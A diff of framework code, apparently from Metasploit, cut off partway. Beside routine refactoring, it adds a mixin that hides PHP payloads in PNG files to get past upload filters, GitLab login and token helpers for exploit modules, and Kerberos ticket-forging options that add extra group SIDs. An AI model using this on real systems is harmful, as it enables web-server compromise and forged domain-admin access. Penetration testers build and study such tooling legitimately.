+    # Normalize any existing left-most whitespace on each line; Ignoring the first line which won't have any preceding whitespace
+    result = str_lines.map.with_index do |line, index|
+      next if line.blank?
+
+      "#{indent}#{index == 0 || smallest_preceding_whitespace.nil? ? line : line[smallest_preceding_whitespace..]}"
+    end.join("\n")
+
+    result
+  end
 end

 end end
@@ -12,7 +12,7 @@ module Msf::Auxiliary::ManageEngineXnode::Config
  # @return [Hash, Integer] Hash containing the data repositories (tables) and their fields (columns) to dump if reading the config file succeeded, error code otherwise
  def grab_config(config_file)
    # get the specified data repositories (tables) and fields (columns) to dump from the config file
-    return CONFIG_FILE_DOES_NOT_EXIST unless File.exists? config_file
+    return CONFIG_FILE_DOES_NOT_EXIST unless File.exist?(config_file)

    begin
      config_contents = File.read(config_file)
@@ -115,7 +115,7 @@ module Msf::DBManager::Loot

      # If the user updates the path attribute (or filename) we need to update the file
      # on disk to reflect that.
-      if opts[:path] && File.exists?(loot.path)
+      if opts[:path] && File.exist?(loot.path)
        File.rename(loot.path, opts[:path])
      end

@@ -136,8 +136,6 @@ class EncodedPayload
    # If the exploit needs the payload to be encoded, we need to run the list of
    # encoders in ranked precedence and try to encode with them.
    if needs_encoding
-      encoders = pinst.compatible_encoders
-
      # Make sure the encoder name from the user has the same String#encoding
      # as the framework's list of encoder names so we can compare them later.
      # This is important for when we get input from RPC.
@@ -151,6 +149,8 @@ class EncodedPayload
      elsif (reqs['Encoder'])
        wlog("#{pinst.refname}: Failed to find preferred encoder #{reqs['Encoder']}")
        raise NoEncodersSucceededError, "Failed to find preferred encoder #{reqs['Encoder']}"
+      else
+        encoders = compatible_encoders
      end

      encoders.each { |encname, encmod|
@@ -558,6 +558,20 @@ protected

    false
  end
+
+  def compatible_encoders
+    arch = reqs['Arch'] || pinst.arch
+    platform = reqs['Platform'] || pinst.platform
+
+    encoders = []
+
+    framework.encoders.each_module_ranked(
+      'Arch' => arch, 'Platform' => platform) { |name, mod|
+      encoders << [ name, mod ]
+    }
+
+    encoders
+  end
 end

 end
@@ -0,0 +1,115 @@
+# -*- coding: binary -*-
+
+require 'chunky_png'
+
+# This mixin module provides methods to inject persistent PHP payloads into a PNG file.
+# It is based on the article of Quentin Roland from SynActiv.
+# https://www.synacktiv.com/en/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html
+# The mixin depends on the GEM library ChunkyPNG that provides the basic PNG image processing functionality.
+#
+# There are five methods of code injection described in the article:
+# 1: Inject PHP payload into the PNG comment field
+# 2: Inject PHP payload at the end of the PNG file, the so called raw insertion
+# 3: Inject PHP payload in the PLTE chunk of the PNG file
+# 4: Inject PHP payload in the IDAT chunk of the PNG file
+# 5: Inject PHP payload in a random tEXT chunk of the PNG file
+#
+# Method 1 and 2 will not survive any image compression configured and applied by a PHP web application
+# Method 3 will survive image compression, but no image resizing configured and applied by a PHP web application
+# Method 4 will survive all compression and resizing but payload is fixed and restricted.
+# Method 5 will survive Imagick resizing
+#
+# In the module below, we will offer only three (3) methods e.g, Raw, PLTE and tEXt for which we will combine method 1 and 5
+# TODO: IDAT chunk payload injection has most potential but is not flexible and is fixed for payloads that can be injected.
+#
+#                     No processing   PHP-GD compression      PHP-GD resizing         Imagick resizing
+# Raw insertion        ✅                    ❌                  ❌                     ❌
+# PLTE chunk           ✅                    ✅                  ❌                     ❌
+# TODO: IDAT chunk     ✅                    ✅                  ✅                     ✅
+# tEXt chunk           ✅                    ❌                  ❌                     ✅
+module Msf::Exploit::Format::PhpPayloadPng
+  # @param payload [String] Payload to be inserted into the generated PNG.
+  # @param injection_method [String] A string accepting only standard values 'RAW', 'PLTE', or 'TEXT'. Defaults to 'PLTE'.
+  # @return [String, nil] PNG binary string if injection is successful, otherwise nil if there was an error.
+  def inject_php_payload_png(payload, injection_method: 'PLTE')
+    if payload.empty?
+      print_error('PNG payload creation failed. No PHP payload provided.')
+      return nil
+    end
+
+    # Execute provided injection method
+    case injection_method
+    when 'RAW'
+      # Inject payload at the end of PNG (raw code injection)
+
+      # Use an image size of 1 pixel by 1 pixel to
+      # create the smallest possible PNG image.
+      image_width = 1
+      image_height = 1
+      png = ChunkyPNG::Image.new(image_width, image_height, ChunkyPNG::Color::BLACK)
+
+      # add payload at the end of PNG
+      png_malicious = png.to_s + payload.to_s
+      return png_malicious
+
+    when 'PLTE'
+      # Inject payload in the PLTE chunk, which holds 1 to 256 palette entries as noted
+      # at http://www.libpng.org/pub/png/spec/1.2/PNG-Chunks.html. Each
+      # entry will be a 3 byte long number of the form:
+      #    Red:   1 byte (0 = black, 255 = red)
+      #    Green: 1 byte (0 = black, 255 = green)
+      #    Blue:  1 byte (0 = black, 255 = blue)
+
+      # payload should have a length with modulo of 3 to fit the 3 bytes RGB palette.
+      # Section 4.1.2 PLTE Palette of http://www.libpng.org/pub/png/spec/1.2/PNG-Chunks.html
+      # notes that PLTE chunks that are not divisible by 3 are considered a violation
+      # of the PNG protocol.
+      payload += ' ' while (payload.length % 3) != 0
+      # check if payload is not bigger then 768 (3x256) bytes to fit in the PLTE chunk
+      if payload.length > 768
+        print_error("PNG payload creation failed. Padded payload size (#{payload.length}) is larger than 768 bytes.")
+        return nil
+      end
+
+      # create base PNG with a right sized PLTE chunk to store the payload
+      image_width = payload.length / 3
+      image_height = payload.length / 3
+      png = ChunkyPNG::Image.new(image_width, image_height, ChunkyPNG::Color::BLACK)
+
+      # create palette entries (max. 256) to host the payload
+      (0..((payload.length / 3) - 1)).each do |i|
+        png[i, 1] = ChunkyPNG::Color.rgb(i, 1, 1)
+      end
+
+      # cycle thru the chunks, find the PLTE chunk and write the payload
+      png_malicious = ChunkyPNG::Datastream.from_blob(png.to_blob)
+      png_malicious.each_chunk do |chunk|
+        if chunk.type == 'PLTE'
+          chunk.content = payload.to_s
+          break
+        end
+      end
+      return png_malicious.to_s
+
+    when 'TEXT'
+      # Inject payload in a new tEXt chunk generated with a random keyword
+      # tEXt chunks are used to store textual data that the recorder
+      # wishes to record within the image as noted at http://www.libpng.org/pub/png/spec/1.2/PNG-Chunks.html
+      # section 4.3.2.1 tEXt Textual data
+
+      # Use an image size of 1 pixel by 1 pixel to
+      # create the smallest possible PNG image.
+      image_width = 1
+      image_height = 1
+      png = ChunkyPNG::Image.new(image_width, image_height, ChunkyPNG::Color::BLACK)
+      # store payload in a tEXt chunk with a randomized keyword
+      random_keyword = Rex::Text.rand_text_alpha(4..16)
+      png.metadata[random_keyword] = payload.to_s
+      return png.to_s
+
+    else
+      print_error("PNG payload creation failed. No valid injection method #{injection_method} provided [RAW, PLTE, TEXT].")
+      return nil
+    end
+  end
+end
@@ -17,6 +17,9 @@ module Msf::Exploit::Remote::AuthOption
  # plaintext authentication is used
  PLAINTEXT = 'plaintext'

+  # SCHANNEL authentication is used.
+  SCHANNEL = 'schannel'
+
  # Do not authenticate with the service
  NONE = 'none'

@@ -41,6 +44,7 @@ module Msf::Exploit::Remote::AuthOption
    AUTO,
    NTLM,
    KERBEROS,
+    SCHANNEL,
    PLAINTEXT,
    NONE
  ]
@@ -0,0 +1,35 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        # This module provides a way of interacting with gitlab installations
+        module Gitlab
+          include Msf::Exploit::Remote::HttpClient
+          include Msf::Exploit::Remote::HTTP::Gitlab::AccessTokens
+          include Msf::Exploit::Remote::HTTP::Gitlab::Authenticate
+          include Msf::Exploit::Remote::HTTP::Gitlab::Error
+          include Msf::Exploit::Remote::HTTP::Gitlab::Form
+          include Msf::Exploit::Remote::HTTP::Gitlab::Groups
+          include Msf::Exploit::Remote::HTTP::Gitlab::Helpers
+          include Msf::Exploit::Remote::HTTP::Gitlab::Import
+          include Msf::Exploit::Remote::HTTP::Gitlab::Rest
+          include Msf::Exploit::Remote::HTTP::Gitlab::Version
+
+          def initialize(info = {})
+            super
+
+            register_options(
+              [
+                Msf::OptString.new('TARGETURI', [true, 'The base path to the gitlab application', '/'])
+              ], Msf::Exploit::Remote::HTTP::Gitlab
+            )
+          end
+
+          # class GitLabClientException < StandardError; end
+        end
+      end
+    end
+  end
+end
@@ -0,0 +1,7 @@
+# -*- coding: binary -*-
+
+# GitLab Access Tokens mixin
+module Msf::Exploit::Remote::HTTP::Gitlab::AccessTokens
+  include Msf::Exploit::Remote::HTTP::Gitlab::Form::AccessTokens
+  include Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::AccessTokens
+end
@@ -0,0 +1,5 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitlab::Authenticate
+  include Msf::Exploit::Remote::HTTP::Gitlab::Form::Authenticate
+end
@@ -0,0 +1,43 @@
+module Msf::Exploit::Remote::HTTP::Gitlab::Error
+  # GitLab error mixin
+  class ClientError < ::StandardError
+    def initialize(message: nil)
+      super(message || 'Gitlab Client Error')
+    end
+  end
+
+  # Authentication error
+  class AuthenticationError < ClientError
+    def initialize
+      super(message: 'Authentication failed')
+    end
+  end
+
+  # Csrf token error
+  class CsrfError < ClientError
+    def initialize(message = 'Could not successfully extract CSRF token')
+      super(message: message)
+    end
+  end
+
+  # Group error
+  class GroupError < ClientError
+    def initialize(message)
+      super(message: message)
+    end
+  end
+
+  # Import error
+  class ImportError < ClientError
+    def initialize(message)
+      super(message: message)
+    end
+  end
+
+  # Version error
+  class VersionError < ClientError
+    def initialize
+      super(message: 'Unable to determine Gitlab version')
+    end
+  end
+end
@@ -0,0 +1,2 @@
+module Msf::Exploit::Remote::HTTP::Gitlab::Form
+end
@@ -0,0 +1,34 @@
+# -*- coding: binary -*-
+
+# Create a Gitlab Access Token via form
+module Msf::Exploit::Remote::HTTP::Gitlab::Form::AccessTokens
+  # Create Gitlab access access token
+  #
+  # @return [String,nil] Gitlab personal access token if created, nil otherwise
+  def gitlab_create_personal_access_token
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/-/profile/personal_access_tokens'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'personal_access_token[name]' => Rex::Text.rand_text_alphanumeric(8),
+        'personal_access_token[expires_at]' => '',
+        'personal_access_token[scopes][]' => 'api',
+        'commit' => 'Create personal access token'
+      },
+      'headers' => {
+        'X-CSRF-Token' => gitlab_helper_extract_csrf_token(path: '/-/profile/personal_access_tokens', regex: /name="csrf-token" content="(.*)"/)
+      }
+    })
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError, "Failed to create access token. Unexpected HTTP #{res.code} response." unless res.code == 200
+
+    token = JSON.parse(res.body)['new_token']
+
+    return token if token
+
+    nil
+  end
+end
@@ -0,0 +1,61 @@
+# -*- coding: binary -*-
+
+# GitLab session mixin
+module Msf::Exploit::Remote::HTTP::Gitlab::Form::Authenticate
+  # performs a gitlab login
+  #
+  # @param user [String] Username
+  # @param pass [String] Password
+  # @param timeout [Integer] The maximum number of seconds to wait before the request times out
+  # @return [String,nil] the session cookies as a single string on successful login, nil otherwise
+  def gitlab_sign_in(username, password)
+    sign_in_path = '/users/sign_in'
+    csrf_token = gitlab_helper_extract_csrf_token(
+      path: sign_in_path,
+      regex: %r{action="/users/sign_in".*name="authenticity_token"\s+value="([^"]+)"}
+    )
+    raise Msf::Exploit::Remote::HTTP::GitLab::Error::CsrfError unless csrf_token
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, sign_in_path),
+      'keep_cookies' => true,
+      'vars_post' => gitlab_helper_login_post_data(username, password, csrf_token)
+    })
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError if res.code != 302
+
+    cookies = res.get_cookies
+    # Check if a valid gitlab cookie is returned
+    return cookies if cookies =~ /(_gitlab_session=[A-Za-z0-9%-]+)/i
+
+    nil
+  end
+
+  # performs a gitlab logout
+  #
+  # @return [Boolean,GitLabError] True if sign out, Msf::Exploit::Remote::HTTP::Gitlab::Error otherwise
+  def gitlab_sign_out
+    csrf_token = gitlab_helper_extract_csrf_token(
+      path: '/',
+      regex: /name="csrf-token" content="(.*)"/
+    )
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/users/sign_out'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        '_method' => 'post',
+        'authenticity_token' => csrf_token
+      }
+    })
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError, 'Failed to sign out' unless res.code == 302 && res.headers&.fetch('Location', '')&.include?('/users/sign_in')
+
+    true
+  end
+end
@@ -0,0 +1,6 @@
+# -*- coding: binary -*-
+
+# GitLab Groups mixin
+module Msf::Exploit::Remote::HTTP::Gitlab::Groups
+  include Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::Groups
+end
@@ -0,0 +1,43 @@
+# -*- coding: binary -*-
+
+# GitLab helpers mixin
+module Msf::Exploit::Remote::HTTP::Gitlab::Helpers
+  # Helper methods are private and should not be called by modules
+
+  private
+
+  # Returns the POST data for a Gitlab login request
+  #
+  # @param user [String] Username
+  # @param pass [String] Password
+  # @param csrf_token [String] CSRF token
+  # @return [Hash] The post data for vars_post Parameter
+  def gitlab_helper_login_post_data(user, pass, csrf_token)
+    post_data = {
+      'utf8' => '✓',
+      'authenticity_token' => csrf_token,
+      'user[login]' => user,
+      'user[password]' => pass,
+      'user[remember_me]' => 0
+    }
+    post_data
+  end
+
+  def gitlab_helper_extract_csrf_token(path:, regex:)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, path),
+      'keep_cookies' => true
+    })
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' if res.nil?
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::CsrfError unless res&.code == 200
+
+    token = res.body[regex, 1]
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::CsrfError, "Could not successfully extract CSRF token using the regex #{regex}" if token.nil?
+
+    token
+  end
+end
@@ -0,0 +1,6 @@
+# -*- coding: binary -*-
+
+# GitLab import mixin
+module Msf::Exploit::Remote::HTTP::Gitlab::Import
+  include Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::Import
+end
@@ -0,0 +1,4 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitlab::Rest
+end
@@ -0,0 +1,2 @@
+module Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4
+end
@@ -0,0 +1,23 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::AccessTokens
+  # Revoke a Gitlab access token via the v4 REST api
+  #
+  # @return [nil,GitLabClientError] nil if revoke, Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientError otherwise
+  def gitlab_revoke_personal_access_token(personal_access_token)
+    res = send_request_cgi({
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, '/api/v4/personal_access_tokens/self'),
+      'ctype' => 'application/json',
+      'headers' => {
+        'PRIVATE-TOKEN' => personal_access_token
+      }
+    })
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError, "Failed to revoke access token.  Unexpected HTTP #{res.code} response." unless res.code == 204
+
+    nil
+  end
+end
@@ -0,0 +1,51 @@
+# -*- coding: binary -*-
+
+# GitLab Groups mixin
+module Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::Groups
+  # Create a new group
+  #
+  # @return [String,nil] Group ID if successful create, nil otherwise
+  def gitlab_create_group(group_name, api_token)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/api/v4/groups'),
+      'ctype' => 'application/json',
+      'headers' => {
+        'PRIVATE-TOKEN' => api_token
+      },
+      'data' => {
+        name: group_name, path: group_name, visibility: 'public'
+      }.to_json
+    })
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::GroupError, "Unable to create group. Unexpected HTTP #{res.code} response." if res.code != 201
+
+    group = JSON.parse(res.body)
+
+    return group if group
+
+    nil
+  end
+
+  # Delete a group
+  #
+  # @return [Bolean,GitLabClientError] True if successful deleted, Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientError otherwise
+  def gitlab_delete_group(group_id, api_token)
+    res = send_request_cgi({
+      'method' => 'DELETE',
+      'uri' => normalize_uri('/api/v4/groups', group_id),
+      'ctype' => 'application/json',
+      'headers' => {
+        'PRIVATE-TOKEN' => api_token
+      }
+    })
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::GroupError, "Unable to delete group. Unexpected HTTP #{res.code} response." if res.code != 202
+
+    true
+  end
+end
@@ -0,0 +1,45 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::Import
+  # Import a repository from a remote URL
+  #
+  # @return [String,nil] Import ID if successfully enqueued, nil otherwise
+  def gitlab_import_github_repo(group_name:, github_hostname:, api_token:)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/api/v4/import/github'),
+      'ctype' => 'application/json',
+      'headers' => {
+        'PRIVATE-TOKEN' => api_token
+      },
+      'data' => {
+        'personal_access_token' => Rex::Text.rand_text_alphanumeric(8),
+        'repo_id' => rand(1000),
+        'target_namespace' => group_name,
+        'new_name' => "gh-import-#{rand(1000)}",
+        'github_hostname' => github_hostname
+      }.to_json
+    })
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+
+    # 422 is returned if the import failed, but the response body contains the error message
+    if res.code == 422
+      raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, ((res.get_json_document || {})['errors'] || 'Import failed')
+    end
+
+    # 201 is returned if the import was successfully enqueued
+    unless res.code == 201
+      raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, ((res.get_json_document || {})['errors'] || 'Import failed')
+    end
+
+    # Example of a successful response body
+    # {"id":54,"name":"gh-import-761","full_path":"/fpXxUqzfQY/gh-import-761","full_name":"fpXxUqzfQY / gh-import-761"}
+
+    body = res.get_json_document
+
+    return body if body
+
+    nil
+  end
+end
@@ -0,0 +1,23 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::Version
+  # Extracts the Gitlab version information from various sources
+  #
+  # @return [String,nil] Gitlab version if found, nil otherwise
+  def gitlab_version
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/api/v4/version'),
+      'keep_cookies' => true
+    })
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::VersionError unless res.code == 200
+
+    body = JSON.parse(res.body)
+    version = body['version'][Regexp.new(Msf::Exploit::Remote::HTTP::Gitlab::GITLAB_VERSION_PATTERN), 1]
+
+    return version if version
+
+    nil
+  end
+end
@@ -0,0 +1,9 @@
+# -*- coding: binary -*-
+
+# GitLab version mixin
+module Msf::Exploit::Remote::HTTP::Gitlab::Version
+  # Used to check if the version is correct: must contain at least one dot
+  GITLAB_VERSION_PATTERN = '(\d+\.\d+(?:\.\d+)*)'.freeze
+
+  include Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::Version
+end
@@ -33,6 +33,7 @@ module Msf
            # @option opts [Integer] :user_id the user SID Ex: 1000
            # @option opts [Integer] :group_id Ex: 513 for 'Domain Users'
            # @option opts [Array<Integer>] :group_ids
+            # @option opts [Array<String>] :extra_sids An array of extra sids, Ex: `['S-1-5-etc-etc-519']`
            # @option opts [String] :realm
            # @option opts [String] :domain_id the domain SID Ex: S-1-5-21-1755879683-3641577184-3486455962
            # @option opts [Time] :logon_time
@@ -48,6 +49,7 @@ module Msf
              user_id = opts[:user_id] || Rex::Proto::Kerberos::Pac::DEFAULT_ADMIN_RID
              primary_group_id = opts[:group_id] || Rex::Proto::Kerberos::Pac::DOMAIN_USERS
              group_ids = opts[:group_ids] || [Rex::Proto::Kerberos::Pac::DOMAIN_USERS]
+              extra_sids = opts[:extra_sids] || []
              domain_name = opts[:realm] || ''
              domain_id = opts[:domain_id] || Rex::Proto::Kerberos::Pac::NT_AUTHORITY_SID
              logon_time = opts[:logon_time] || Time.now
@@ -68,17 +70,20 @@ module Msf
                logon_server: ''
              )
              validation_info.group_ids = group_ids
-
+              if extra_sids && extra_sids.length > 0
+                validation_info.extra_sids = extra_sids.map do |sid|
+                  { sid: sid, attributes: Rex::Proto::Kerberos::Pac::SE_GROUP_ALL }
+                end
+              end

              logon_info = Rex::Proto::Kerberos::Pac::Krb5LogonInformation.new(
                data: validation_info
              )

-
              client_info = Rex::Proto::Kerberos::Pac::Krb5ClientInfo.new(
                client_id: logon_time,
                name: user_name
-            )
+              )

              server_checksum = Rex::Proto::Kerberos::Pac::Krb5PacServerChecksum.new(
                signature_type: checksum_type
@@ -97,7 +102,7 @@ module Msf

              pac_type = Rex::Proto::Kerberos::Pac::Krb5Pac.new
              pac_type.assign(pac_elements: pac_elements)
-              pac_type.sign!(key: opts[:checksum_enc_key])
+              pac_type.sign!(service_key: opts[:checksum_enc_key])
              pac_type
            end

@@ -7,9 +7,11 @@ module Msf
    class Remote
      module Kerberos
        module Ticket
+          # @param [String] session_key The session key
+          # @param [Array<String>] extra_sids An array of extra sids, Ex: `['S-1-5-etc-etc-519']`
          def forge_ticket(enc_key:, enc_type:, start_time:, end_time:, sname:, flags:,
                           domain:, username:, user_id: Rex::Proto::Kerberos::Pac::DEFAULT_ADMIN_RID,
-                           domain_sid:, save_ccache: true)
+                           domain_sid:, extra_sids: [], session_key: nil)
            sname_principal = create_principal(sname)
            cname_principal = create_principal(username)
            group_ids = [
@@ -19,7 +21,6 @@ module Msf
              Rex::Proto::Kerberos::Pac::SCHEMA_ADMINISTRATORS,
              Rex::Proto::Kerberos::Pac::ENTERPRISE_ADMINS,
            ]
-            key_length = enc_type == Rex::Proto::Kerberos::Crypto::Encryption::AES256 ? 16 : 8
            # https://www.ietf.org/rfc/rfc3962.txt#:~:text=7.%20%20Assigned%20Numbers
            case enc_type
            when Rex::Proto::Kerberos::Crypto::Encryption::AES256
@@ -29,6 +30,13 @@ module Msf
            else
              checksum_type = Rex::Proto::Kerberos::Crypto::Checksum::HMAC_MD5
            end
+
+            session_key_byte_length = enc_type == Rex::Proto::Kerberos::Crypto::Encryption::AES256 ? 32 : 16
+            session_key ||= SecureRandom.hex(session_key_byte_length / 2)
+            if session_key.bytes.length != session_key_byte_length
+              raise "Invalid key length for session key, expected #{session_key_byte_length}, got #{session_key.length} for session key #{session_key}"
+            end
+
            opts = {
              client: cname_principal,
              server: sname_principal,
@@ -39,13 +47,14 @@ module Msf
              realm: domain.upcase,
              key_value: enc_key,
              checksum_enc_key: enc_key,
-              secure_random_key: SecureRandom.hex(key_length),
+              session_key: session_key,
              enc_type: enc_type,
              user_id: user_id,
              group_ids: group_ids,
              checksum_type: checksum_type,
              client_name: username,
              domain_id: domain_sid,
+              extra_sids: extra_sids,
              flags: flags
            }

@@ -62,10 +71,6 @@ module Msf
            # Wrap the ticket up with its metadata, i.e. its key/sname/time information etc
            ccache = ticket_as_krb5ccache(ticket, opts: opts)

-            if save_ccache
-              Kerberos::Ticket::Storage.store_ccache(ccache, framework_module: self)
-            end
-
            ccache
          end

@@ -73,7 +78,7 @@ module Msf
            ticket_enc_part = Rex::Proto::Kerberos::Model::TicketEncPart.new

            ticket_enc_part.key = Rex::Proto::Kerberos::Model::EncryptionKey.new(
-              type: opts[:enc_type], value: opts[:secure_random_key]
+              type: opts[:enc_type], value: opts[:session_key]
            )
            ticket_enc_part.flags = opts[:flags]
            ticket_enc_part.crealm = opts[:realm]
@@ -124,7 +129,7 @@ module Msf
                  server: create_ccache_principal(opts[:server], opts[:realm]),
                  keyblock: {
                    enctype: opts[:enc_type],
-                    data: opts[:secure_random_key]
+                    data: opts[:session_key]
                  },
                  authtime: opts[:auth_time],
                  starttime: opts[:start_time],
@@ -30,13 +30,14 @@ module Msf
        OptBool.new('SSL', [false, 'Enable SSL on the LDAP connection', false]),
        Msf::OptString.new('DOMAIN', [false, 'The domain to authenticate to']),
        Msf::OptString.new('USERNAME', [false, 'The username to authenticate with'], aliases: ['BIND_DN']),
-        Msf::OptString.new('PASSWORD', [false, 'The password to authenticate with'], aliases: ['BIND_PW']),
+        Msf::OptString.new('PASSWORD', [false, 'The password to authenticate with'], aliases: ['BIND_PW'])
      ])

      register_advanced_options(
        [
          *kerberos_storage_options(protocol: 'LDAP'),
          *kerberos_auth_options(protocol: 'LDAP', auth_methods: Msf::Exploit::Remote::AuthOption::LDAP_OPTIONS),
+          Msf::OptPath.new('LDAP::CertFile', [false, 'The path to the PKCS12 (.pfx) certificate file to authenticate with'], conditions: ['LDAP::Auth', '==', Msf::Exploit::Remote::AuthOption::SCHANNEL]),
          OptFloat.new('LDAP::ConnectTimeout', [true, 'Timeout for LDAP connect', 10.0])
        ]
      )
@@ -86,6 +87,35 @@ module Msf
      end

      case datastore['LDAP::Auth']
+      when Msf::Exploit::Remote::AuthOption::SCHANNEL
+        pfx_path = datastore['LDAP::CertFile']
+        fail_with(Msf::Exploit::Remote::Failure::BadConfig, 'The LDAP::CertFile option is required when using SCHANNEL authentication.') if pfx_path.blank?
+        fail_with(Msf::Exploit::Remote::Failure::BadConfig, 'The SSL option must be enabled when using SCHANNEL authentication.') if datastore['SSL'] != true
+
+        unless ::File.file?(pfx_path) and ::File.readable?(pfx_path)
+          fail_with(Msf::Exploit::Remote::Failure::BadConfig, 'Failed to load the PFX certificate file. The path was not a readable file.')
+        end
+
+        begin
+          pkcs = OpenSSL::PKCS12.new(File.binread(pfx_path), '')
+        rescue => e
+          fail_with(Msf::Exploit::Remote::Failure::BadConfig, "Failed to load the PFX file (#{e})")
+        end
+
+        connect_opts[:auth] = {
+          method: :sasl,
+          mechanism: 'EXTERNAL',
+          initial_credential: '',
+          challenge_response: true
+        }
+        connect_opts[:encryption] = {
+          method: :start_tls,
+          tls_options: {
+            verify_mode: OpenSSL::SSL::VERIFY_NONE,
+            cert: pkcs.certificate,
+            key: pkcs.key
+          }
+        }
      when Msf::Exploit::Remote::AuthOption::KERBEROS
        fail_with(Msf::Exploit::Failure::BadConfig, 'The Ldap::Rhostname option is required when using Kerberos authentication.') if datastore['Ldap::Rhostname'].blank?
        fail_with(Msf::Exploit::Failure::BadConfig, 'The DOMAIN option is required when using Kerberos authentication.') if datastore['DOMAIN'].blank?
@@ -264,8 +294,8 @@ module Msf
      end

      # NOTE: Find the first entry that starts with `DC=` as this will likely be the base DN.
-      naming_contexts.select! {|context| context =~ /^(DC=[A-Za-z0-9-]+,?)+$/}
-      naming_contexts.reject! {|context| context =~ /(Configuration)|(Schema)|(ForestDnsZones)/}
+      naming_contexts.select! { |context| context =~ /^(DC=[A-Za-z0-9-]+,?)+$/ }
+      naming_contexts.reject! { |context| context =~ /(Configuration)|(Schema)|(ForestDnsZones)/ }
      if naming_contexts.blank?
        print_error("#{peer} A base DN matching the expected format could not be found!")
        return
@@ -287,26 +317,26 @@ module Msf
    #   bind request failed.
    # @return [Nil] This function does not return any data.
    def validate_bind_success!(ldap)
-      bind_result = ldap.as_json['result']['ldap_result']
+      bind_result = ldap.get_operation_result.table

      # Codes taken from https://ldap.com/ldap-result-code-reference-core-ldapv3-result-codes
-      case bind_result['resultCode']
+      case bind_result[:code]
      when 0
        vprint_good('Successfully bound to the LDAP server!')
      when 1
-        fail_with(Msf::Module::Failure::NoAccess, "An operational error occurred, perhaps due to lack of authorization. The error was: #{bind_result['errorMessage'].strip}")
+        fail_with(Msf::Module::Failure::NoAccess, "An operational error occurred, perhaps due to lack of authorization. The error was: #{bind_result[:error_message].strip}")
      when 7
        fail_with(Msf::Module::Failure::NoTarget, 'Target does not support the simple authentication mechanism!')
      when 8
-        fail_with(Msf::Module::Failure::NoTarget, "Server requires a stronger form of authentication than we can provide! The error was: #{bind_result['errorMessage'].strip}")
+        fail_with(Msf::Module::Failure::NoTarget, "Server requires a stronger form of authentication than we can provide! The error was: #{bind_result[:error_message].strip}")
      when 14
-        fail_with(Msf::Module::Failure::NoTarget, "Server requires additional information to complete the bind. Error was: #{bind_result['errorMessage'].strip}")
+        fail_with(Msf::Module::Failure::NoTarget, "Server requires additional information to complete the bind. Error was: #{bind_result[:error_message].strip}")
      when 48
        fail_with(Msf::Module::Failure::NoAccess, "Target doesn't support the requested authentication type we sent. Try binding to the same user without a password, or providing credentials if you were doing anonymous authentication.")
      when 49
        fail_with(Msf::Module::Failure::NoAccess, 'Invalid credentials provided!')
      else
-        fail_with(Msf::Module::Failure::Unknown, "Unknown error occurred whilst binding: #{bind_result['errorMessage'].strip}")
+        fail_with(Msf::Module::Failure::Unknown, "Unknown error occurred whilst binding: #{bind_result[:error_message].strip}")
      end
    end

@@ -314,9 +344,11 @@ module Msf
    # Fail with an appropriate error code if the query failed.
    #
    # @param query_result [Hash] A hash containing the results of the query
-    #   as a 'resultCode' with an integer representing the result code,
-    #   'errorMessage' containing an optional error message, and
-    #   'matchedDN' containing the matched DN.
